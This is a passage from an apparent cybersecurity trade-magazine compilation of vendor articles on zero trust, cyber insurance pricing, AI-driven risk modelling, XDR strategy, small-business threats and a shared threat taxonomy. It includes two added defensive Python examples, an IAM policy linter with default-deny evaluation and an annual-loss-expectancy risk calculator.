teams can likewise automate the evaluation of access rights, quickly identifying overly permissive rights,
compliance drift, and other potential threat vectors. As a result, security and SecOps teams can use
automation to quickly revert access, find and fix misconfigurations, and identify indicators of compromise
(IOCs).
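As an added example (not Anitian’s platform or code), the two ideas above put into working form: the default-deny posture from the earlier section, in which nothing is allowed until an explicit grant matches, and the automated review of access rights just described, which flags overly permissive grants before they reach production. The documents follow the AWS IAM JSON policy format; the two policies, the bucket and log-group names and the account number are constructed for this example:

```python
"""Added example: lint access policies for grants that break least
privilege, and evaluate requests with a default-deny rule. The document
shape follows the AWS IAM JSON policy format; the two sample policies,
the bucket and log-group names and the account number are constructed."""
import fnmatch
import json
from typing import Any

# Constructed "full trust" policy of the kind a team writes while standing
# up an environment, beside the scoped replacement it should become.
FULL_TRUST_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}
  ]
}
""")

SCOPED_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-app-bucket/*"},
    {"Effect": "Allow",
     "Action": "logs:PutLogEvents",
     "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/app/*"},
    {"Effect": "Deny", "Action": "s3:DeleteObject", "Resource": "*"}
  ]
}
""")


def _as_list(value: Any) -> list:
    """Action and Resource may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def lint_policy(policy: dict) -> list[str]:
    """Findings for Allow statements that grant more than a need-to-know scope."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if "NotAction" in stmt:
            findings.append(f"stmt {i}: NotAction allows everything except a list; use explicit Action")
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"stmt {i}: wildcard action {action!r}")
        if "*" in resources:
            findings.append(f"stmt {i}: applies to every resource ('*')")
        if "Condition" not in stmt and ("*" in actions or "*" in resources):
            findings.append(f"stmt {i}: broad grant with no Condition to constrain it")
    return findings


def is_allowed(policy: dict, action: str, resource: str) -> bool:
    """Default deny: an explicit Deny always wins, an Allow must match both
    action and resource, and a request no statement mentions is refused."""
    allowed = False
    for stmt in policy.get("Statement", []):
        action_hit = any(fnmatch.fnmatchcase(action.lower(), p.lower())
                         for p in _as_list(stmt.get("Action")))
        resource_hit = any(fnmatch.fnmatchcase(resource, p)
                           for p in _as_list(stmt.get("Resource")))
        if not (action_hit and resource_hit):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        if stmt.get("Effect") == "Allow":
            allowed = True
    return allowed


if __name__ == "__main__":
    for name, pol in (("full-trust", FULL_TRUST_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, lint_policy(pol) or ["no findings"])
    print(is_allowed(SCOPED_POLICY, "s3:GetObject", "arn:aws:s3:::example-app-bucket/report.csv"))
```

Running lint_policy over the full-trust policy returns three findings (wildcard action, every resource, no Condition) while the scoped policy returns none, which is the kind of check that can run against a test environment on every change. is_allowed refuses any request no statement explicitly permits, so an action the policy never mentions is denied rather than silently allowed.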
All this boils down to the fact that a zero trust approach appears to be the right way to improve your cloud
security posture and the world is going in that direction. Of course, there are multiple ways to get there.
Some paths seem faster and more logical than others. Now it’s up to you to choose.
About the Author
John Vecchi is the Chief Marketing Officer (CMO) of Anitian. As Chief
Marketing Officer, John brings more than 24 years of experience in high-
tech marketing, strategy, product marketing, product management, sales
and consulting. Most recently, John was Chief Marketing Officer at
ColorTokens and Anonyome Labs. Previously, he served as senior vice
president of product marketing and strategy for Blue Coat Systems, Chief
Marketing Officer for Solera Networks (acquired by Blue Coat), Vice
President of WW Marketing at Zscaler, Head of Global Product Marketing
& Strategy for Check Point Software, as well as executive marketing
consultant for Symantec and Sr. Director of Product Marketing for McAfee’s
Network Security Business Unit. John still serves as an Advisor at Signal
Peak Ventures and has a B.A. from the University of St. Thomas, St. Paul, MN, focusing on international
business and foreign language. As CMO, John oversees global marketing, branding, communications,
press & analysts, and go-to-market strategy & execution.
John can be reached online on LinkedIn: https://www.linkedin.com/in/johnvecchi or Twitter:
https://twitter.com/johnvecchi and at our company website https://www.anitian.com/
Why Are Cyber Insurance Premiums Going Up, And How Can You Get a Better Deal?
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group
It may not have attracted as much attention as the coronavirus, but ransomware has become a pandemic
unto itself and it’s sending the price of cyber insurance skyrocketing. Here’s what you can do to keep
your premiums as low as possible.
Cyber insurance is a relatively new addition to the insurance market that helps to protect organisations
from the fallout of being hacked and is typically available to cover:
Costs related to the loss of or damage to data
Content-related claims related to data
Costs to prevent future breaches
Fines and penalties imposed by regulators
Public relations costs
Liability for denial of service from or access to electronically provided data
Costs associated with cyber extortion reimbursement
Compensation to third parties for failure to protect their data
But at a time when more organisations are clamouring for these sorts of protections, cyber insurance
carriers are raising premiums and limiting the coverage they’re willing to offer.
In a recent report entitled Cyber insurance: A hard reset, multinational insurance broker Howden reported
that global insurance pricing had increased by an average of 32 per cent from June 2020 to June 2021.
Similarly, insurance broker Marsh’s latest Global Insurance Market Index found that cyber insurance
premiums shot up 56 per cent in the US and 35 per cent in the UK from the second quarter of 2020 to
the second quarter of 2021.
Marsh reports that Australian businesses, specifically, have been slugged with cyber insurance premium
jumps of up to 30 per cent, and those prices are expected to just keep rising.
Why are cyber insurance premiums going up?
Essentially, cyber attacks are becoming too common for the insurance sector, which relies on businesses
insuring themselves against scenarios that might not end up happening for its profits. With hacks
becoming a virtual inevitability, safeguarding businesses against them is an increasingly shaky prospect
for insurers.
According to both the Howden and Marsh reports, it’s the frequency and severity of ransomware attacks,
in which cybercriminals take control of a network and demand payment to hand it back, that are driving
cyber insurance prices skyward.
The number of ransomware attacks worldwide shot up 170 per cent from the first quarter of 2019 to the
fourth quarter of 2020, according to Howden, while the average cost of a ransomware attack is up 145
per cent in 2021 compared to 2020.
There are a number of reasons for the rise of ransomware, including the availability of low-cost
ransomware kits and ransomware-as-a-service (RaaS) offerings that enable users to launch ransomware
attacks without any technical expertise on their part, effectively lowering the barrier to entry to the
cybercrime ‘industry’.
The proliferation of double extortion is also a factor. In a double extortion attack, not only do
cybercriminals take control of your system and demand payment for its return, but they also threaten to
leak the data they’ve stolen from you, and demand a separate payment not to do so. Ransomware group
REvil had the dubious honour of being the first to use the double extortion tactic in June 2020, and it’s
since taken off worldwide.
As is so often the case, the COVID-19 pandemic is also partly to blame. The sudden explosion in remote
work and the acceleration in digitalisation that has come with that has exponentially increased the attack
surfaces that are available to cyber criminals, and made it harder for breaches to be discovered.
IBM and Ponemon’s Cost of a Data Breach Report 2021 found that data breaches were 17.5 per cent
more costly where remote work was a factor, and that organisations that had more than half of their
workforce working remotely took 58 days longer to identify and contain breaches, on average.
Not only has the rash of ransomware attacks sent cyber insurance premiums soaring, it’s also affected
the coverage that some insurers are willing to offer. In May, French insurance giant AXA announced it
would no longer write policies that reimburse ransomware victims (and was immediately hit with a
retaliatory ransomware attack), while other insurers are declining to take on new clients, or capping their
coverage at about half of what they used to offer.
How can you lower the cost of your cyber insurance policy?
A wide range of factors can impact your cyber insurance premium, including the size of your business
and its annual revenue, the industry you operate in, and the type of data you have access to.
But in much the same way that a high-risk driver will have to pay more for car insurance, the Howden
report found that insurers are demanding more from businesses’ cybersecurity, and will charge
organisations that are more likely to fall victim to a breach a higher premium, or refuse to insure them
altogether.
This is in line with a recent letter from the Insurance Council of Australia to the Department of Home
Affairs, in which the Insurance Council wrote: “Insurance underwriters place a strong focus on a
customer’s risk management and security culture when reviewing, assessing and pricing the risk.
Effective risk management, including a strong internal security culture, can be the most effective defence
against threats.”
This might seem like a no-brainer, but it hasn’t always been this way. In the past, insurers might have
just asked potential clients to fill out a questionnaire about their cybersecurity practices, and taken them
at their word that their house was in order.
In today’s environment, however, these insurers are partnering with outside firms to vet potential clients’
cybersecurity protocols, and demanding to see evidence that they have appropriate controls in place and
are following best practices, including using multi-factor authentication, implementing zero trust policies,
and backing up and encrypting their data.
For instance, the IBM and Ponemon report on the cost of data breaches found that organisations using
high-standard encryption (at least AES-256, at rest and in transit) had an average breach cost that was
29.4 per cent lower than organisations using low-standard or no encryption. Insurers, who are likely to
be aware of that data, might then offer broader cover and better pricing to organisations that can
demonstrate they’re using strong encryption technology.
Companies who take a proactive approach by providing cyber security education for all employees,
including advice on how to identify suspicious emails and requests, are also likely to be looked upon
favourably by insurers.
“Carriers… are demanding extremely high cyber security standards,” says Shay Simkin, Global Head of
Cyber at Howden.
“Impeccable cyber security hygiene is therefore crucial for companies looking to purchase cyber
insurance cover. Not only does it open up capacity availability, it also helps provide more favourable
pricing and terms.”
Or, as the Insurance Council of Australia puts it: “Capabilities that indicate a strong risk management and
security culture may, for instance, include internal data handling and internet usage policies for all
employees across the business, adequate prevention, detection, and response security capabilities and
internal data breach incident response plans. Guidance and resources that support businesses,
especially small businesses, to protect themselves against cyber threats can strengthen risk
management and security practices.”
This isn’t a set-and-forget proposition, either. In many cases, insurers will reassess their policies every
12 months, so even after you use your organisation’s preparedness to get a good deal on cyber
insurance, you’ll need to ensure you maintain those high standards and keep the proper procedures in
place.
Then again, why wouldn’t you? Cyber insurance is not, in and of itself, a cybersecurity strategy, and no
matter how low your premium is and how great the terms of your coverage are, it should only be used as
a last resort. The best response to a breach is still to avoid being breached at all.
At the end of the day, if your business never has to make a cybersecurity claim, it’ll be a win for your
insurer, but it’ll be a win for you and your clients and customers, too.
With its unique three-key encryption technology, Cryptoloc is the world’s safest cybersecurity platform.
To show you take data management seriously, visit cryptoloc.com.
About the Author
Jamie Wilson is the founder and chairman of Cryptoloc,
recognized by Forbes as one of the 20 Best Cybersecurity
Startups to watch in 2020. Headquartered in Brisbane,
Australia, with offices in Japan, US, South Africa and the UK,
Cryptoloc have developed the world’s strongest encryption
technology and the world’s safest cybersecurity platform,
ensuring clients have complete control over their data. Jamie
can be reached online at www.linkedin.com/in/jamie-wilson-
07424a68 and at www.cryptoloc.com
AI/ML Powered Risk Modeling: A Decision-Making
Framework
By AJ Sarkar, Founder and CEO of OptimEyes.ai
A company’s C-suite and directors assess cyber threats based on the potential impact on high-level
business objectives. How will a particular attack impact year-over-year growth? Client experience and
trust? Company reputation? An anticipated expansion or product launch?
The information security operations team, on the other hand, needs technical details to execute an
effective tactical defense, hold the hackers at bay, and minimize damage.
In the middle, CISOs assess vulnerabilities within network segmentation, architecture, governance,
operations and processes. They watch for threats and work with their counterparts throughout the
business to stop impacts from rippling across the organization. This requires effective, efficient
communication across the enterprise with info-sec ops, business unit leaders, and the CEO, CFO, CIO,
CCO, and CRO, among others.
These stakeholders, of course, assess the same situation through different perspectives, with different
responsibilities, objectives, jargon, and success metrics. They need a common language to communicate
about threats and ensure the implications for supply chains, customer experience, operations, financial
performance, data privacy compliance and more are understood and managed effectively.
Until recently, there has been no common language for managing risk across the organization, let alone
up to the board. Limitations in the effectiveness of risk monitoring, quantification and benchmarking have
only exacerbated the problem.
Flying Blind
Despite advances in technology, most organizations lack continual, real-time monitoring of cybersecurity
vulnerabilities or a comprehensive picture of risk across the enterprise. Data needed to assess risk impact
often is collected at a single point in time, assessed manually in spreadsheets, and analyzed in isolated
functional silos. This leaves companies flying blind, lacking a big-picture risk assessment, and likely to
miss emerging issues until they escalate into crises. This traditional approach to managing risk leaves
companies exposed when trying to understand and deal with the ferocity of today’s threats and
challenges.
Reporting to executive teams routinely occurs quarterly, biannually, or annually and lacks a timely, holistic
view of overall enterprise risk, so leaders struggle with risk prioritization and proactive, strategic planning.
Consider this: only 30% of organizations surveyed for PWC’s new 2022 Global Digital Trust Insights
Report quantify their cybersecurity risk.
As a result, in most companies the C-suite lacks the timely information and context they need to make
sound, informed decisions. How big is the threat? How does it compare with other threats on the horizon?
What is the potential impact on the company’s key objectives? Without adequate risk-assessment data
to analyze situations, prioritize responses, set policies and allocate resources, many simply rely on
intuition, best guesses or a stab in the dark.
At the same time, many CISOs also lack a view of the big picture and, therefore, the ability to confidently
advise the C-suite or direct the info-sec ops team to aggressively target and mitigate the greatest threats.
Timely and comprehensive data, robust analytics, and intuitive data visualization are needed in tandem
to tell the complete story and ensure each group within the hierarchy (leadership, management, and
ops) understands the situation, can fulfill its roles and responsibilities, and can support the others.
A Universal Translator
What gives a common risk language its meaning for cross-organizational communication is the ability to
gather and analyze data. Comprehensive operational data, information on strategic objectives
and risk tolerances, and real-time monitoring results for cyber risks enable enterprises to quantify,
benchmark, and predict the magnitude and financial implications of threats and vulnerabilities.
In this scenario, a new, powerful methodology, Integrated Digital Risk Modeling (IDRM), serves as
the universal translator. It enables enterprises to collect and analyze mass amounts of underlying data,
translates it into business intelligence, and presents it in an intuitive visual format specific to each
stakeholder within the organization. This gives all stakeholders a common narrative, contextual
understanding, and the ability to drill into the information they need to achieve their goals, as well as the
ability to communicate more effectively with each other.
This approach is based on the foundations of IDRM and includes the following:
Inside-Out Modeling: Enterprises use their unique operational data to continuously monitor risk
exposure. This generates instantly actionable organization-specific insights that can’t be achieved
by the more common practice of relying on general industry information.
Financial Impact Quantification: Companies calculate the annual loss expectancy of specific
risks in order to understand real-time financial exposure. With this intel they can see threats and
vulnerabilities in a financial context, weigh and compare their potential impact, and inform priority
setting and resource investment and allocation.
Targeted Industry Benchmarking: Enterprises compare their risk exposure to industry peers
after data is adjusted to take account of industry type, company size, risk appetite, data assets,
and other factors.
Multiple Use Cases by Design: The ability to automate any risk framework or enterprise use
case and integrate enterprise-wide risk modeling eliminates siloed reporting and enhances
executive and board level decision making. The design flexibility helps organizations respond
nimbly to the latest emerging threat or headache.
Neuroscience-Based Dashboards: Present comprehensive, enterprise-wide reports in clear,
unbiased formats that lead to more consistent, confident decisions and risk mitigation at each
management level.
Risk Scenario Planning: Artificial intelligence (AI) and machine learning (ML) deliver a reliable,
predictive process that enables enterprises to assess best- and worst-case scenarios, compare
threats, and determine where to invest in risk mitigation. The platform continues to learn as it’s
exposed to more enterprise data, which fine-tunes outputs and insights.
Rapid, Customized Deployment: IDRM can customize the data captured across use cases to
deliver a comprehensive, bespoke view of each organization’s unique risk landscape, and the
platform can be operational within two to three weeks to generate fast ROI.
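A worked example, added here and not part of OptimEyes’ IDRM method, of the financial impact quantification and priority setting described in the list above. It uses the standard quantitative risk formula (single loss expectancy = asset value × exposure factor; annual loss expectancy = SLE × annualized rate of occurrence) to rank risks and to judge whether a proposed control pays for itself. The three risks, their figures and the control’s cost are constructed:

```python
"""Added example: rank risks by annual loss expectancy (ALE) and compute
the return on a proposed control. Uses the standard quantitative model
(SLE = asset value * exposure factor, ALE = SLE * ARO); the figures are
constructed and do not come from any real assessment."""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Risk:
    name: str
    asset_value: float      # value of the affected asset, in currency units
    exposure_factor: float  # fraction of the asset's value lost per incident, 0..1
    aro: float              # annualized rate of occurrence (incidents per year)

    @property
    def sle(self) -> float:
        """Single loss expectancy: cost of one incident."""
        return self.asset_value * self.exposure_factor

    @property
    def ale(self) -> float:
        """Annual loss expectancy: expected yearly cost of this risk."""
        return self.sle * self.aro


# Constructed register of three risks for a fictional company.
RISKS = [
    Risk("ransomware on file servers", asset_value=2_000_000, exposure_factor=0.4, aro=0.5),
    Risk("public website defacement", asset_value=300_000, exposure_factor=0.1, aro=2.0),
    Risk("customer database theft", asset_value=5_000_000, exposure_factor=0.3, aro=0.1),
]


def rank_by_ale(risks: list[Risk]) -> list[Risk]:
    """Highest expected annual loss first: the order in which to invest."""
    return sorted(risks, key=lambda r: r.ale, reverse=True)


def rosi(risk: Risk, aro_after: float, exposure_after: float, annual_control_cost: float) -> float:
    """Return on security investment for a control that changes the likelihood
    and/or severity of one risk: ALE reduction minus the control's yearly cost.
    A negative result means the control costs more than it is expected to save."""
    residual = replace(risk, aro=aro_after, exposure_factor=exposure_after)
    return risk.ale - residual.ale - annual_control_cost


def summary(risks: list[Risk]) -> list[tuple[str, float, float]]:
    """(name, SLE, ALE) rows, ranked, ready for a dashboard or board report."""
    return [(r.name, r.sle, r.ale) for r in rank_by_ale(risks)]


if __name__ == "__main__":
    for name, sle, ale in summary(RISKS):
        print(f"{name:30s} SLE={sle:>12,.0f} ALE={ale:>12,.0f}")
    # Constructed control: offline backups plus MFA, assumed to cut ransomware
    # frequency to 0.2 per year and loss per incident to 20% of asset value.
    print("ROSI of backup+MFA control:", rosi(RISKS[0], 0.2, 0.2, 120_000))
```

The ranking puts the ransomware risk first even though the database theft has the larger single-incident cost, because expected annual loss also weighs how often each event is likely to occur; the ROSI figure is what lets a control’s budget be argued in the same terms.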
The AI/ML-driven IDRM methodology gives organizations a complete, actionable view of the risks they
face and gives the C-suite, the CISO, and the information security operations teams the ability to
communicate effectively, in real time, to make critical risk-based decisions.
About the Author
AJ is the CEO of OptimEyes.ai, an AI-powered SaaS solution for
enterprise security, compliance, and privacy risk management. Unlike
others, OptimEyes monitors risk in real time, on a continuous basis, and
provides a trackable risk score, with a single integrated dashboard
to easily understand total risk.
AJ is also an Official member of the Forbes Technology Council, and
the Founder and Chairman of ICCG, a 501c (6) non-profit, established
to improve local competitiveness in a global economy.
AJ is a serial Entrepreneur who successfully founded and sold a BPM
(Business Process Management) software company, and also
successfully established an IT consulting company. AJ has his MS in Computer Science from the
University of Pune, India, and resides in San Diego, CA. Our company website: https://optimeyes.ai
Follow us on LinkedIn and Twitter.
Feeling Beleaguered? 3 Practical Steps for Cybersecurity Mastery
By Tim Liu, Co-Founder & CTO, Hillstone Networks
Cybersecurity may seem an unending challenge, with new vulnerabilities, attacks and breaches
announced almost daily. With all the loud headlines, and the potentially large financial and professional
impacts of a breach or other attack, it’s easy for CISOs to feel a bit beleaguered.
Ransomware, for example, doubled in 2021 according to Verizon’s 2021 Data Breach Investigations
Report. Most industries have come under attack, including education, retail, government, manufacturing,
energy, healthcare, and financial services, among others. A notable development in 2021 was the rise of
supply-chain attacks like the Kaseya incident, which impacted at least 1,500 customers.
Data breaches, while often a component of a ransomware attack, also occur separately. Like
ransomware, breaches have increased markedly in recent years. According to the Identity Theft
Resource Center, in the U.S. alone, data breaches through September 30 were up by 27% over the same
period in 2020.
Further adding to the challenges of cybersecurity, the pandemic-driven proliferation of remote workers
has dramatically expanded the potential attack surface, as has the increasing adoption of clouds,
containers, virtual machines, and other distributed resources. Compounding these challenges are
increasing compliance requirements, a growing number of regulatory policies, and the sheer volume of
technologies on the market that can address at least some portion of these challenges.
While the challenges of cybersecurity are many and diverse, a few key strategies or principles can cut
through the clutter and bring a greater degree of order and control for cybersecurity professionals. At a
high level, think of it as: see, understand, act.
Lack of visibility, or the ability to ‘see’ granularly across assets connected to the network, can be one of
the biggest constraints on a successful security posture. To be effective, security needs visibility into all
assets, including networks, servers and services, applications, users and north-south as well as
east-west traffic, including traffic between network components like clouds, VMs and containers.
A number of security solutions seek to fill the visibility gap, such as Secure Access Service Edge (SASE),
which merges SD-WAN with other security capabilities to offer greater visibility into scattered assets and
services. Another, micro-segmentation, is designed to mitigate threats and vulnerabilities in east-west
traffic between VMs and containers.
However, note that these technologies are most likely isolated from each other, or siloed. A newer
solution called eXtended Detection and Response, or XDR, leverages other security technologies (like
SASE, NGFW, WAF, and micro-segmentation) to aggregate data and deliver deep visibility into traffic
into, out of and within the network and its assets.
The second part of the strategy, ‘understand,’ means gaining insights from traffic and other data that
allows accurate analysis and characterization of potential attacks, threats and anomalies. For example,
multi-stage, multi-layer attacks have evolved to camouflage themselves as normal traffic to elude security
tactics, but usually leave subtle traces that can lead to their discovery and mitigation. By aggregating and
analyzing data across the entire network and assets, these threats can be detected much faster and with
far greater accuracy.
This step of the strategy also addresses a challenge faced by many security teams. As point security
products have multiplied in typical networks, the number of alerts and alarms has risen dramatically,
leading to a syndrome dubbed “alert fatigue.” Security teams often struggle to keep up and discern
legitimate threats from false positives.
Over the years, a number of products have been developed to address these dual concerns; however,
many of them are cumbersome and costly. Here, too, XDR offers a number of benefits in threat correlation
analysis. Using AI- and ML-enhanced methods as well as cloud-based threat intelligence, XDR evaluates
the aggregated data it gathers from other network-connected devices and identifies potential threats with
a high degree of accuracy, including disguised attacks that might otherwise be missed.
With granular visibility and thorough analysis in place, the final step of the strategy can be enabled. ‘Act’
refers to the ability to automate security responses to well-defined threats, relieving security staff of many
manual interventions. An XDR solution, for example, can orchestrate security ‘playbooks’ across multiple
security products, like NGFWs, WAFs and others, to provide a comprehensive response to threats.
Playbooks, or templates, optimize workflows for security incidents, and XDR solutions typically include
multiple predefined playbooks and allow custom playbooks to be defined by security teams as needed.
The XDR solution continues its operations of see, understand and act in an infinite loop, allowing rapid
incident triage and containment for improved cybersecurity.
This high-level strategy gives CISOs and other security team members the visibility, swift incident
detection, and far-reaching response that’s needed to secure network assets from endpoint to cloud.
Recognized in the Gartner Magic Quadrant for network firewalls for 8 consecutive years, Hillstone
Networks was recently named to the ‘visionaries’ quadrant. Founded in 2006, the company’s
infrastructure protection solutions provide enterprises and service providers with the visibility and
intelligence to comprehensively see, thoroughly understand, and rapidly act against multidimensional
threats and attacks. Trusted by global companies, Hillstone protects from the edge to the cloud with
improved total-cost-of-ownership.
About the Author
Timothy Liu is Co-Founder and Chief Technology Officer of
Hillstone Networks. In his role, Mr. Liu is responsible for the
company’s product strategy and technology direction, as well
as global marketing and sales. Mr. Liu is a veteran of the
technology and security industry with over 25 years of
experience. Prior to founding Hillstone, he managed the
development of VPN subsystems for ScreenOS at NetScreen
Technologies, and Juniper Networks following its NetScreen
acquisition. Mr. Liu is also a co-architect of the patented
Juniper Universal Access Control and holds an additional
patent on Risk Scoring and Risk-Based Access Control for
NGFW. In his career, Mr. Liu has served in key R&D positions
at Intel, Silvan Networks, Enfashion and Convex Computer.
Mr. Liu holds a Bachelor of Science from the University of Science and Technology of China and a Ph.D.
from the University of Texas at Austin.
Tim can be reached online at @thetimliu and at our company website https://www.hillstonenet.com/
The Most Common Types of Cyberattacks Plaguing SMBs
And How to Protect Against Them
By Richard Clarke, Chief Insurance Officer, Colonial Surety
The media landscape is dominated by headlines like “Hackers Target Cryptocurrency Companies in
HubSpot Data Breach” and “Microsoft confirms it was breached by hacker group,” leading most to
believe that cyberattacks and data breaches only afflict larger companies. However, the truth is, small
and midsized businesses (SMBs) are likely more vulnerable, as they generally have less protection and
more limited budgets to address management of the risk.
Most SMB owners don’t know they are just as susceptible to a cyberattack as their larger counterparts.
But, in fact, a recent report from IBM revealed that SMBs spend about $3M per breach, underscoring just
how important it is for SMBs to take cybersecurity and cyber protection seriously.
In order to understand the actions SMBs should take to best protect themselves, it’s important to first
identify the types of cyberattacks they are most likely to face. With that, let’s quickly review three of the
more common, ongoing types of cyberattacks facing SMBs.
1. Cyberextortion and Ransom Demands. Cyberextortion and ransom demands are among the
most common cyberattacks for SMBs. These scenarios involve an attack or threat coupled with
a demand for money, or some other response, in return for stopping or remediating an attack.
SMBs are particularly vulnerable to these types of attacks because they do not have the
protections that larger organizations do, nor do they have the budgets to ramp up their spending
in those areas.
2. Privacy-Related Violations. Privacy-related violations involve a cyberattack or data breach
that results in a hacker or cybercriminal gaining unauthorized access to a database or network
and stealing private information. Any business that warehouses, handles, or transfers personal
or corporate information has a potential exposure to this type of cyberattack.
3. Social Engineering Fraud. Social engineering fraud, also known as impersonation fraud, is a
particularly tricky threat for a business of any size. Unlike other common types of cyberattacks
that exploit a security vulnerability, social engineering fraud targets employees by fraudulently
impersonating a third party in an effort to deceive an employee into releasing funds or property,
generally via wire transfer; this is often done through email phishing.
The aftershock
If you think the attack itself is where the problem begins and ends, you would be wrong. Following an
attack there are aftershocks that can ripple for decades if a company is not properly prepared.
One example is intrusion-related restoration costs. These arise when an SMB has experienced an attack
that includes unauthorized access to its networks; the business must then pay steep costs to restore its
networks to proper operating function. Not only can this process be expensive, it can be time-consuming
as well.
Another example is notification-related expenses. When personally identifiable information is involved
in a data security breach, notification laws, which vary from state to state, require that the affected
individuals be formally notified so they can take proper precautions to protect their information. The cost
of providing the notifications mandated by the individual statutes is an unbudgeted expense for SMBs and
can be quite high.
Setting up the appropriate guardrails
There are actions SMBs can take to both minimize the risk of these types of cyberattacks, as well as to
prepare for them if they do occur.
First, check, and re-check, cyber-vulnerabilities on an ongoing basis. This can be done internally,
though some businesses choose to employ ‘friendly hackers’ to help determine their biggest
vulnerabilities.
Second, make use of multi-factor authentication (MFA) to protect against phishing, social engineering
and password brute-force attacks. This can also help prevent logins from attackers exploiting weak or
stolen credentials.
Third, train employees to contact companies directly when they receive unsolicited messages asking for
business-related information; to never provide personal or business information to someone they are not
certain is authorized; to never enter sensitive information into a webpage before checking its security
settings; and to make use of existing security measures like email filters, antivirus software, and firewalls.
Additionally, each employee should be sure to keep all of their software updated.
To supplement the organization’s risk management efforts, strong consideration should be given to
cyber insurance. Cyber insurance is a safety net offering organizations both legal and technical support
to move forward with a response plan, ensuring customers and employees remain digitally safe once
an attack occurs. SMBs are sought by many insurers: some insurers focus on writing larger risks, or
some of the exposure, and some insurers prefer SMB-sized risks. A variety of insurance coverage is
available, and although cyber insurance pricing has been increasing over the past few years, coverage
is generally available.
Essentially every business that deals with sensitive information and data is vulnerable to cyberattacks
regardless of size. With cybercriminals rapidly becoming more sophisticated in their tactics, putting
forward a holistic cybersecurity plan combining these measures is the best way for SMBs to prepare
themselves for an increasingly likely cyberattack.
About the Author
Richard Clarke, Chief Insurance Officer, Colonial Surety . As an
insurance industry veteran with more than three decades of experience,
Richard is a Chartered Property Casualty Underwriter (CPCU), Certified
Insurance Counselor (CIC) and Registered Professional Liability
Underwriter (RPLU). He leads insurance strategy and operations for the
expansion of Colonial Surety’s SMB-focused product suite, building out
the online platform into a one-stop-shop for America’s SMBs.
Richard can be reached at https://www.colonialsurety.com
Why A “Group of Rivals” Developed A Cybersecurity Taxonomy, And What It Buys You
Advancing Risk Management and Stemming the River of Risk by Adopting the Consistent Taxonomy
of Cybersecurity Threats: Cybersecurity’s “Lingua Franca.”
By Charlie Miller, Senior Advisor, Shared Assessments, CTPRP, Distinguished Ponemon Fellow
Companies have been assessing their risks for ages so that they can mitigate them. When companies
began to outsource, they faced new risk challenges because they didn’t have much visibility into the
control adequacy of the third parties they used. Technology, digital transformation, networking
connectivity, and the Internet have grown into a commercial space over the past 25 years, and companies
and their third parties now face a complex ecosystem of cybersecurity issues. As a cybersecurity
risk professional, you know them all.
Except maybe for the new ones somebody is concocting right now.
It’s one thing to monitor the cyber control activity and threats for one organization. Outsourcing
drives cyber security monitoring to a new level, because suddenly it’s not just your own organization
you’re worried about. You have to be aware of the most critical threats for your third-party suppliers and
service providers as well because compromises there may affect you. A large company might have
40,000 suppliers, or more. Monitoring all of that is a tall order.
Enter Continuous Monitoring
Some third parties are directly connected to corporate networks and some are not, but all have increased
cyber security exposures. Security Rating Services (SRS) have arisen recently. Their solutions, usually
provided as Software-as-a-Service (SaaS), continually watch over the subscribing organization’s cyber
hygiene as well as that of a host of third parties and potential third parties, examining events and
vulnerabilities for which they provide a rating. The offerings and ratings of SRS providers are similar, but
they vary in terminology, price and pricing models, the events they monitor, their alignment with external
security frameworks and standards, customer interface, data sources, methods for gathering and reporting
information on cybersecurity control weaknesses, and in many other ways. Basically, they’re all different.
That diversity gives you a rich variety of choices but makes it difficult to compare services and ensure
that cyber hygiene monitoring aligns with your control requirements.
There is another and perhaps more subtle aspect to all this difference between organizations and the
providers they use. Every IT and cyber security manager must communicate upwards in the organization,
eventually all the way to the board of directors. Clarity in that communication affects funding, staffing,
and equipment as well as security per se.
What was needed was a lingua franca, a common language that describes the world of monitored
cyber threats. This would allow organizations to:
• Achieve a better understanding of how events monitored by SRS align with the outsourcer’s control
requirements, and vice versa.
• Compare the services offered by several SRS providers.
• More easily communicate any issues identified by the SRS and develop mitigation approaches to
correct them.
• Clearly communicate across the third-party risk management ecosystem, which helps boards and
leadership teams evaluate cyber threats to the business and align appropriate resources. It is important
to have a common terminology, especially when communicating to non-technical people. In an
environment with global supply chains, this clear communication becomes even more important.
The lack of such a lingua franca, a consistent taxonomy of cybersecurity threats, has posed problems
for organizations, third parties, and SRS providers.
So, What’s the Problem?
Table 1 and Table 2 show an example of a common yet specific terminology problem. A company wants
to assess a vendor to ensure that the vendor’s email servers cannot be used for phishing attacks targeting
the outsourcing company. Specifically, the outsourcer wants to know if the vendor has enabled the
Sender Policy Framework (SPF) on their network. SPF is a Domain Name System (DNS) configuration
that organizations can enable to help stop attackers from impersonating an organization’s email
addresses.
When reviewing Security Rating Service A’s alert category, it is easy to spot the reference to SPF
because SPF is specifically listed. However, in Security Rating Service B’s solution, it is hard to tell if
either Category 1 or Category 2 matches the outsourcer’s need for SPF monitoring.
A Group of Rivals
Shared Assessments is a member-driven organization that has developed and promoted standardized
resources for corporate risk assessment (not just cyber risk assessment) for over a decade. SA members
including SRS providers such as 23Advistory, BitSight, Black Kite, Panorays, RiskRecon, and Security
Scorecard worked through Shared Assessments to create the common taxonomy with which they
could describe their varied offerings. The taxonomy establishes consistent language, practices, and
reporting structures for complex cyber events and vulnerabilities, and removes the potential for
ambiguities. Each of the “rivals” sees advantages for themselves and their clients.
The World Economic Forum and NIST are both considering leveraging the taxonomy to ensure
consistency with their own frameworks and terminology.
The taxonomy itself takes no stance on the relative importance of any one event over any other. What is
required is that an event is currently being monitored by someone, in some way, in the real world. The
events are described in the adverse to avoid duplication. For example, one SRS provider may say “the
XYZ patch is missing; that’s bad” and provide a lower score, while another provider may say “the XYZ
patch is present; that’s good” and provide a higher score. The taxonomy always describes the XYZ
patch in its adverse form to avoid describing the condition twice.
